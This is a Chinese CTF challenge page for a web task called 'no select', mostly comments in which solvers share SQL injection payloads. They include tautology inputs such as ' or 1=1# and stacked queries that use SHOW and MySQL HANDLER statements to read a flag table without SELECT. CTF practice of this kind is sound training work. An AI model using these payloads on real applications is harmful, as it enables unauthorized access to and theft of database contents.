no selectWEB 未解决

分数: 35 金币: 5
题目作者: AL4N233
一  血: 羽义
一血奖励: 5金币
解  决: 1432
提  示:
描  述:
flag{}
评论
2686213396 2月前

sqlmap发现没有数据表可以进行注入,通过手动注入,bpGET发包id=1‘ or1=1 # 响应结果 中即有flag

回复 0

iNMB 2月前

flag{*****}

回复 0

SLfanCTF 2月前

堆叠注入:?id=1';show databases;use flag;show tables;handler flag open;handler flag read first;handler flag read next;....直到读出flag

回复 0

zhuizhui 2月前

?id=1' or 1=1;#--

回复 1

llc123 4月前

直接用万能密码太没意思了,堆叠语句:?id=1';handler flag open;handler flag read next;这里继续拼接handler flag read next;handler flag close;#

回复 2

冥王 4月前

试了好多评论区下面的都不成功,只有这一个成功了?id=1%27+or+1%3D1%23

回复 0

nihaozy 4月前

有哥们通过select编码绕过滤爆出来的吗?我没成功

回复 0
一个姓⎝李⎠的师傅~ 17天前

用 show 查表名,然后堆叠查表内容

回复 0

梦梦子 4月前

1 ’ or '1=1

回复 0

江南花家第七子花满楼 5月前

1' or '1=1

回复 0

liuguowang75 5月前

原来 1 ' or ' 1=1 可以直接出呀,我都sqlmap了

回复 1

WriteUp

image
Serim

10 金币

评分(10)

解题动态

huangyujie 攻破了该题 4小时前
连浩然55520 攻破了该题 14小时前
TwangT 攻破了该题 14小时前
walkerming 攻破了该题 22小时前
爱吃馒头 攻破了该题 1天前
desireart 攻破了该题 1天前
zcgzcx1234 攻破了该题 1天前
暗A166668 攻破了该题 1天前
weiyouzhunze 攻破了该题 1天前
geekhzy 攻破了该题 2天前
吴王饭差 攻破了该题 2天前
白六真的6 攻破了该题 2天前
cl20354 攻破了该题 3天前
1234567nxb 攻破了该题 3天前
5326 攻破了该题 3天前
18469110745 攻破了该题 3天前
alizee 攻破了该题 3天前
泡泡鱼 攻破了该题 3天前
Lzcen 攻破了该题 4天前
13551372126 攻破了该题 4天前
问题反馈